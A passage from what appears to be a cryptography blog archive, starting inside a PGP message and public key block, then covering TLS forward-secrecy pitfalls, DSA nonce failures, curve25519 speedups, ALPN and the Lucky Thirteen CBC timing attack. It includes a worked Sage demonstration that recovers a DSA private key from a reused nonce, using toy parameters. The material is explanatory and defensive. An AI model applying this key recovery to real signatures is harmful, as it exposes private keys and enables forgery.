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
++wUhec=
=7n2p
-----END PGP MESSAGE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
=NKhg
-----END PGP PUBLIC KEY BLOCK-----

How to botch TLS forward secrecy

There's been some discussion about forward secret TLS recently, spurred, I think, by this piece from Declan McCullagh on CNET.

In case there are people out there wondering about turning it on, I thought it would be a good time to discuss some of the ways to mess it up!

In the case of multiplicative Diffie-Hellman (i.e. DHE), servers are free to choose their own, arbitrary DH groups. Historically some servers have had groups as small as 256-bits! Opera used to reconnect without DHE cipher suites in this case and Chrome now simply fails the connection with ERR_SSL_WEAK_SERVER_EPHEMERAL_DH_KEY. However, it's still the case that some servers use 512-bit DH groups, meaning that the connection can be broken open with relatively little effort.

So the first way to mess up forward secrecy is to use under sized DH groups. Ideally the DH group would match or exceed the RSA key size but 1024-bit DHE is arguably better than straight 2048-bit RSA so you can get away with that if you want to.

If you're using ECDHE then you don't need to worry about it being too small because the smallest EC group that clients support (P-256) is far, far stronger than 2048-bit RSA anyway.

So the next way to mess up forward secrecy is to get compromised via session resumption. TLS offers two session resumption mechanisms: session IDs (where the server and client each store their own secret state) and session tickets (where the client stores the server's state, encrypted by the server). If an attacker can obtain the session resumption information for a connection then they can decrypt the connection. (This needn't be completely true, but it is for TLS because of the way that TLS is designed.)

In the case of session IDs, the session information will either be kept in memory or kept on disk, depending on how the server is configured. (See the SSLSessionCache directive in Apache.) The forward secrecy of a connection is bounded by how long the session information is stored at the server. A small, in-memory cache likely has a high turnover rate, but a disk-cache could retain that information for a long time. Ideally one would have a medium sized, in-memory cache that turned over once a day or so.

In the case of session tickets, the server's encrypted state is transmitted to the client in the clear, so the server's session ticket key is what's protecting the connection. If you're running a single server then the session ticket key is probably generated randomly, at startup and kept in memory. So the forward secrecy of the connections is actually limited by the security of the server's memory until the server is restarted. It's possible for servers to run for many months without a restart so connections could be a lot less forward secure than you might think.

If you run several servers then they all need to share the same session ticket key otherwise they can't decrypt each other's session tickets. In Apache you would configure that with the SSLSessionTicketKeyFile directive. In this case your forward secrecy is limited by the security of that file on disk. Since your SSL private key is probably kept on the same disk, enabling forward secure cipher suites probably hasn't actually achieved anything other than changing the file that the attacker needs to steal!

So how do you run forward secrecy with several servers and support session tickets? You need to generate session ticket keys randomly, distribute them to the servers without ever touching persistent storage and rotate them frequently. However, I'm not aware of any open source servers that support anything like that.

Sudden Death Entropy Failures

During the time that the RSA patent was in force, DSA was the signature algorithm of choice for any software that didn't want to deal with patent licenses. (Which is why lots of old PGP keys are still DSA.) It has slowly disappeared since the patent expired and it appears that 4096-bit RSA is now the algorithm of choice if you're on the run from the NSA [1]. (And if you're a journalist trying to get a reply: keyid BDA0DF3C.)

But DSA can also be used with elliptic curves in the form of ECDSA and, in that form, it's likely that we'll see it return in the future, at least to some extent. SSH and GPG both support ECDSA now and CAs are starting to offer ECDSA certificates for HTTPS.

Unfortunately, DSA has an important weakness that RSA doesn't: an entropy failure leaks your private key. If you used a machine affected by the Debian entropy bug then, in that time, messages that you encrypted with RSA can be broken. But if you signed anything with a DSA key, then your private key is compromised.

The randomness in DSA is absolutely critical. Given enough signatures, leaking just a handful bits per signature is sufficient to break it. In the limit, you can make the make the mistake that Sony did and not understand that the random number needs to be generated for each message and, seemingly, just pick one and code it in. (See XKCD.)

But it doesn't need to be this way! All that is required of the nonce is that it be unique for each distinct message and secret, and we can achieve that by hashing the message and private key together. That's what Ed25519 does and I've added the option to OpenSSL to do the same. Unlike RSA and Ed25519 signatures, DSA signatures are probabilistic - signing the same message twice with the same key will result in different signatures. Since someone may be depending on that, OpenSSL also hashes in some randomness to maintain that feature.

(p.s. if you're an actual cryptographer, please take a look at the core of the code and let me know if I'm an idiot.)

Since the DSA specification says that the nonce must be randomly generated, and compliance with the spec is important for many users, this isn't enabled by default. For ECDSA keys, one needs to call EC_KEY_set_nonce_from_hash, for example. But hopefully we can measurably improve things with little effort by doing this.

Appendix

Here's an example of breaking DSA with a known nonce: essentially the Sony PlayStation hack. I've used the variable names from the Wikipedia page for those that want to follow along, although I'm not using a subgroup to keep things simple.

(The example is done with Sage.)

Let's pick some (public) DSA parameters:

p = 2903
F = GF(p)
g = F(2)
n = g.multiplicative_order()

Next, generate a key pair. x is the private key and y is the public key:

x = int(F.random_element()) % n
y = g^x
(x, y)
(1282, 966)

Generate our nonce, which will be fixed for two different messages in this example:

k = int(F.random_element()) % n
kInv = inverse_mod(k, n)

The first message that we sign will be 42 and the pair (r, s) is the signature. (Normally the message would be a hash of a much larger message.) The signature is very simple: r is gk and s is (m + xr)/k:

m = 42
r = int(g^k) % n
s = ((m + x*r) * kInv) % n
(r, s)
(1401, 1168)

As an aside, we can verify the signature that we just made:

w = inverse_mod(s, n)
u1 = m*w
u2 = r*w
v = g^u1*y^u2
v == r
True

Next, we also sign the message 24 (which I'll call mm) and we gather the two signatures. We have s and ss, both with the same r. Since s = (m + xr)/k, we can subtract the two to get (m + xr - mm - xr)/k, which is just (m - mm)/k. Thus k = (m - mm)/(s - ss). Given k, we can rearrange the original equation for s: s = (m + xr)/k ⇒ sk = m + xr ⇒ sk - m = xr ⇒ (sk - m)/r = x. And thus we have the private key:

(r, s) = (1401, 1168)
(r, ss) = (1401, 1212)
kk = ((42 - 24)*inverse_mod(s-ss,n)) % n
xx = ((s*kk - 42) * inverse_mod(r, n))%n
print xx == x
xx
True
1282

Faster curve25519 with precomputation

(Update: based on questions, I've clearly failed to point out what this is, or rather what it isn't. Fixed base multiplication only applies when performing many operations on the same public key, i.e. key generation or perhaps some other cases. If you're working with random public keys then precomputaion cannot help I'm afraid.)

Diffie-Hellman is one of the most important public-key cryptographic primitives, even if it doesn't have the name recognition of, say, RSA. When anything is providing forward secrecy then it's very likely using Diffie-Hellman. In fact, the reason that web servers do RSA operations at all is mostly a legacy hangover. If we could design things afresh then there would be a lot of more Diffie-Hellman and everything would be a lot faster!

Of the concrete implementations of Diffie-Hellman, curve25519 is the fastest, common one. There are some faster primitives in eBACS, but the ones that are significantly faster are also significantly weaker. My machine (E5-2690, with Hyperthreading and TurboBoost disabled) can do a curve25519, arbitrary base point, scalar multiplication (a.k.a. Diffie-Hellman key agreement) in just 67.5µs.

But nobody will complain if it gets faster, right?

The core of Diffie-Hellman is calculating xy in some group. The simplest way to calculate xy is the classic square-and-multiply algorithm:

(Note: I'll be using multiplicative notation throughout because I think it's more familiar to most people, although additive is more common for the specific groups that we're dealing with here.)

Start with the number 1, which is x0 (because anything to the power of zero is 1). If we multiply by x then we get x1. So, by multiplying by x we've added one to the exponent. If we square our new number then we get x2 - squaring doubles the exponent.

Now consider the exponent as a binary number: x1 is x1b and squaring it gets us x10b. Squaring is a left shift of the exponent! Now, given any y in binary form, we can calculate xy with a series of additions by 1 and left shifts - i.e. multiplies by x and squarings.

If we have y = 1011b then we start with x0 = 1, as always, and read y left-to-right: the first bit is a one so we multiply by x to get x1b. Left shift: x10b. We already have the 0 in there so left shift again: x100b. Multiply by x: x101b. Left shift: x1010b. Multiply by x: x1011b. Done.

With square-and-multiply, the bits of the desired exponent are clocked in, bit by bit, as the squarings do the left shifting.

This is essentially what curve25519 does. It has lots of tricks to make it fast but, if you're calculating lots of powers of the same x then there are a number of tricks to make things faster. I'm only going to cover a couple of basic ones here.

Firstly, one can precalculate x1, x2, x3, … x15. Now, by multiplying by one of those values we can add any value from 0 to 15 to the exponent in a single multiplication. We're essentially clocking in four bits at a time. After one multiplication we have to do four squarings to left shift 4 bits to make space for the next 4 bits to be clocked in. This reduces the number of multiplications by a factor of 4.

Next, imagine that our exponents were always 8-bits long. We could precalculate x00000000b, x00000001b, x00010000b and x00010001b. By multiplying by one of those values we can clock in bits in two positions at once. Previously we always clocked in bits at the right hand side of the exponent, but those precomputed powers mean that we can clock in bits at the forth bit too. Thus we deal with the exponent as two, 4-bit values and the squarings are shared between them. We only have to square and multiply four times to cover the whole 8-bit value.

In cryptography, the powers are usually larger than 8-bits, of course, but you can clock in at 4 or 8 positions if you wish. It's a classic time/memory trade-off because more positions mean exponentially more precomputed values.

(There's more and better tricks than the two that I've just outlined, some are detailed on this Wikipedia page.)

Precomputation in curve25519

The reason that such precomputation hasn't been applied to curve25519 before is (I think), because of a detail that I glossed over before: curve25519 is actually a Montgomery curve that uses differential addition. Rather than being able to multiply arbitrary values, a and b, you instead need to also know the value of a/b first. That throws a spanner in the works of the typical optimisations.

If you review elliptic curves, you'll recall that operations on the elliptic curve group consist of operations on the underlying field. In curve25519's case it's the field GF(2255-19), which is where it gets its name from. We can roughly measure the amount of time that something will take by the number of field operations required. (Note to practitioners: I'm taking a field squaring as 0.8 multiplications and one multiplication is an ‘operation’.)

A curve25519 exponent is 255 bits long. Each squaring takes 3.6 operations and each multiplication by x takes 4.6 operations. 255*(3.6+4.6) is 2091 operations. We also need a final conversion (a field inversion) that costs 215.2 operations for a total of 2306.2. That's the number to beat.

In order to work in a group which has nice, arbitrary multiplication operations we map curve25519 to an isomorphic, Twisted Edwards curve. In fact, exactly the same curve as used by Ed25519, which is a fast signature primitive. This also means that we get to use Ed25519's highly optimised code. In order to be able to use as much code as possible, we use exactly the same precomputation scheme as described in section 4 of the paper.

This scheme is based on 256-bit exponents, which it splits into 64, 4-bit chunks. But it uses lots of precomputed values! For every other 4-bit chunk, it precomputes all 16 possible values. So the first subtable contains the 16 values x0000b, x0001b, x0010b, …, x1111b. The next subtable contains the 16 values for the next but one 4-bit chunk. So that's x0000 0000 0000b, x0001 0000 0000b, x0010 0000 0000b, …, x1111 0000 0000b. It has 32 of those subtables!

It picks one value from each subtable and, with 32 multiplications, takes care of half the bits of the exponent. Then it squares four times to left-shift those values into place and does another 32 multiplications from the same subtables to take care of the other half of the bits. That's a total of 64 multiplications and 4 squarings.

(It actually uses a trick which means that it only needs to store 8 of the 16 values in each subtable, but that's outside the scope of this post.)

We're in a different group now and so the costs are different: multiplications cost 6 operations and squarings cost 7. (The field is the same so an ‘operation’ takes the same time.) 64*6 + 4*7 = 412, so that's looking good. We need another field inversion to finish up, same as curve25519, for a total cost of 627.2. Those rough costs suggest that the Twisted Edwards precomputation should be 3.6x faster, which is promising!

(Updated: I originally suggested that two field inversions were required because I'm an idiot. Thanks to @CodesInChaos for asking why.)

The actual timings

Based on the amd64-64-24k implementation of Ed25519 in SUPERCOP, it's fairly easy to implement. On the same machine as the curve25519 speed was measured, above, the precomputed curve25519 runs in 21.9µs, a 3.1x speedup with 24KB of tables. So it's not as fast as the rough calculations suggested, but that's because we're now processing 24KB of memory. That cache pressure isn't free of course, although benchmarks make it look mostly free because they run in a tight loop and so the tables will always be in L1 cache. Still, it means that CPU can sustain 350,000 public key operations per second.

(Code still too messy to release. I hope to tidy it up next week.)

NPN and ALPN

Since its inception, SPDY has depended on a TLS extension called NPN. NPN allows a TLS connection to negotiate which application-level protocol will be running across it.

NPN allows SPDY to be enabled efficiently. If we had run SPDY on a different port, then we would have had to be constantly creating probing connections to see whether a site supported SPDY as well as HTTPS. Even if we knew that a site supported SPDY, network devices between any given client and that site might block connections to the different TCP port. If we had tried an HTTP Upgrade header, that would have slowed everything down and caused compatibility issues with servers and proxies that didn't process the header correctly.

NPN also allows us to update SPDY without spending round trips on a version negotiation. Overall, NPN has worked very well for SPDY.

NPN attempted to be a little bit future proof by sending the selected application protocol name under encryption, so that network devices couldn't discriminate. The benefit was somewhat limited because the server's list of supported protocols was still sent in the clear but we believe that anything that can be encrypted, should be encrypted.

There is an alternative to NPN: ALPN is essentially the same design except that the negotiation is done in the clear (like other TLS extensions).

Last Friday, at IETF 86 in Orlando, the TLS working group considered both designs and came to a rough consensus on ALPN. ALPN is currently on track to be published as an RFC at some point and we will be switching SPDY over to it and deprecating NPN.

Once IANA has assigned a TLS extension number for ALPN, Google servers will start supporting both NPN and ALPN, with a preference for ALPN. Chrome and, I expect, other browsers will start sending both NPN and ALPN extensions. During this time, SPDY servers will be able to switch from NPN to ALPN without dropping SPDY support for current clients.

At some point after the end of 2014, I plan on removing NPN support from Chrome and Google servers. Any old servers and clients will continue to function just fine: they'll just use HTTPS.

Lucky Thirteen attack on TLS CBC

In an upcoming paper (made public this morning), Nadhem AlFardan and Kenny Paterson describe another method of performing Vaudenay's attack on CBC as used in TLS. Firstly I'd like to thank the researchers for notifying the various vendors ahead of time so that patches could be prepared: the disclosure process has gone very smoothly in this case. I couldn't have asked for anything more - they did everything right.

Vaudenay's attack requires an attacker to be able to detect when a CBC padding check has succeeded, even if the authentication check then fails. Authentication should always be applied after encryption to avoid this, but TLS famously did it the wrong way round with CBC mode.

Knowing whether a padding check succeeded reveals information about the decrypted plaintext. By tweaking the ciphertext over many trials, it's possible to progressively decrypt an unknown ciphertext. For details, see their paper, which does a better job of explaining it than I would.

Vaudenay first used the fact that these two situations (padding check failure and authenticator failure) resulted in different TLS alert values, although that didn't result in a practical attack because TLS errors are encrypted. Once that was corrected (by specifying that the same alert value should be sent in each case) the next year's paper used a timing-side channel: if the authentication check wasn't performed when the padding check failed then, by timing the server's response, an attacker could tell whether the server aborted processing early.

To try and remove that side-channel, TLS stacks perform the authentication check whether or not the padding check succeeds. However, here's what I commented in the Go TLS code:

Note that we still have a timing side-channel in the MAC check, below. An attacker can align the record so that a correct padding will cause one less hash block to be calculated. Then they can iteratively decrypt a record by breaking each byte. However, our behavior matches OpenSSL, so we leak only as much as they do.

That pretty much sums up the new attack: the side-channel defenses that were hoped to be sufficient were found not to be (again). So the answer, this time I believe, is to make the processing rigorously constant-time. (Details below.)

As a practical matter, since a padding or authenticator check failure is fatal to a TLS connection, performing this attack requires a client to send the same plaintext secret on thousands of different connections to the same server. This isn't a trivial obstacle but it's possible to meet this requirement for cookies with a browser and bit of Javascript injected into any origin in the same session.

For DTLS the attack is much easier because a rejected record doesn't cause the connection to be destroyed and the same authors developed a method for amplifing timing attacks against DTLS in a previous paper

Unfortunately, unlike BEAST, this isn't something that we can unilaterally fix on the client side (except by disabling CBC mode, which might have significant compatibility issues.) On the server side, making RC4 the most preferable cipher solves the problem although I do recommend that server admins apply patches as they become available even so. Having RC4 as an option has been a useful fallback for CBC problems but, if patches aren't applied, then RC4 becomes a monoculture in the future.

Implementing constant time CBC decoding

Fixing this problem in a backwards compatible manner is, sadly, really rather complex. What need to ensure that all CBC records are authenticated in constant time. Initially we define constant-time to mean that, for all values of the secret input, the trace of instructions executed and memory locations accessed is identical (on an in-order machine). Here the secret input is the decrypted CBC record before the padding and MAC have been checked.

Meeting this definition is tough and there's a great temptation to remove some of the more glaring timing leaks and hope that the remainder is small enough not to be practical. But the DTLS trick mentioned above can be used to amplify any timing side-channels. Additionally, situations change and implementations that are currently only exposed over a network may, in the future, be exposed to attackers running on the same machine. At that point, cache-line probing and other powerful timing probes can be brought to bear against any side-channels that remain.

For the purposes of this post, we consider the decrypted, CBC record to contain the following parts:

  1. n bytes of plaintext. (Which may be compressed but, within our scope, it's plaintext.)
  2. mac_size bytes of MAC. (Up to 48 bytes in TLS with SHA-384. We conservatively assume that the minimum number of MAC bytes is zero since this is clearly a valid lower-bound and accounts for truncated MAC extensions.)
  3. padding_length bytes of padding.
  4. One byte of padding length. (Some consider this to be part of the padding itself, but I'll try to be consistent that this length byte is separate.)

With this secret data in hand, we need to perform three steps in constant time:

  1. Verify that the padding bytes are correct: the padding cannot be longer than the record and, with SSLv3, must be minimal. In TLS, the padding bytes must all have the same value as the length byte.
  2. Calculate the MAC of the header and plaintext (where the header is what I'm calling the additional data that is also covered by the MAC: the sequence number etc).
  3. Extract the MAC from the record (with constant memory accesses!) and compare it against the calculated MAC.
Utilities

We will make extensive use of bitwise operations and mask variables: variables where the bits are either all one or all zero. In order to create mask values it's very useful to have a method of replicating the most-significant-bit to all the bits in a value. We'll assume that an arithmetic right shift will shift in the MSB and perform this operation for us:

#define DUPLICATE_MSB_TO_ALL(x) ( (unsigned)( (int)(x) >> (sizeof(int)*8-1) ) )
#define DUPLICATE_MSB_TO_ALL_8(x) ( (uint8_t)( (int8_t)(x) >> 7) )

However, note that the C standard does not guarantee this behaviour, although all CPUs that I've encountered do so. If you're worried then you can implement this as a series of logical shifts and ORs.

We'll define some more utility functions as we need them.

SSLv3 padding

